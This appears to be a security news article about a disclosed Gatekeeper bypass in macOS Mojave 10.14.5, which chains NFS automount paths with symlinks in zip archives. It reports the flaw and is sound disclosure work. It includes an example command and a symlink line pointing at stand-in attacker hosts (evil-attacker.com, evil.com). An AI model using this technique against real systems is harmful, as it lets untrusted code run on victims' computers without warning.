An unpatched vulnerability in macOS 10.14.5 also known as Mojave was recently discovered. The flaw could allow an attacker to execute arbitrary code without the need of user interaction, thus bypassing Gatekeeper.
This discovery comes from researcher Filippo Cavallarin from Segment, an Italy-based cybersecurity company. “On MacOS X version <= 10.14.5 (at time of writing) it is possible to easily bypass Gatekeeper in order to execute untrusted code without any warning or user's explicit permission,” the researcher wrote.
How is the Gatekeeper bypass possible?
First, it should be noted that it’s in Gatekeeper’s design to accept both external drives and network shares as safe location, allowing apps that they contain to run flawlessly. However, by putting together two legitimate features of macOS, it is possible to deceive the Gatekeeper and its “intended behavior”.
So, what are these features? The first one allows a user to automatically mount a network share by simply accepting a path beginning with “/net/”:
For example
ls /net/evil-attacker.com/sharedfolder/
will make the os read the content of the ‘sharedfolder’ on the remote host (evil-attacker.com) using NFS.
The other feature is about zip archives containing symbolic links that point to arbitrary locations. Furthermore, the software that decompresses zip files on macOS doesn’t perform checks on the symlinks prior to creating them, the researcher explained.
How would an attack work? An attacker could craft a zip file with a symbolic link to an automount hacker-controlled endpoint (ex Documents -> /net/evil.com/Documents) and could send it to a targeted system. The user would download the malicious archive, and would extract the malicious file without suspecting anything.
Now the victim is in a location controlled by the attacker but trusted by Gatekeeper, so any attacker-controlled executable can be run without any warning. The way Finder is designed (ex hide .app extensions, hide full path from titlebar) makes this tecnique very effective and hard to spot, the researcher noted.
There’s also a video demonstration of how this Gatekeeper bypass works.
This is not the first case of macOS build-in protection a.k.a. Gatekeeper being bypassed. In February this year, Trend Micro security researchers discovered that a malicious Windows .exe file could infect Mac computers, and could download infostealer malware accompanied by adware on their systems.
In that case, the .exe files were able to evade Gatekeeper’s protection because they were not checked by the software, designed to check only native Mac files. This could lead to bypassing the code signature check and verification.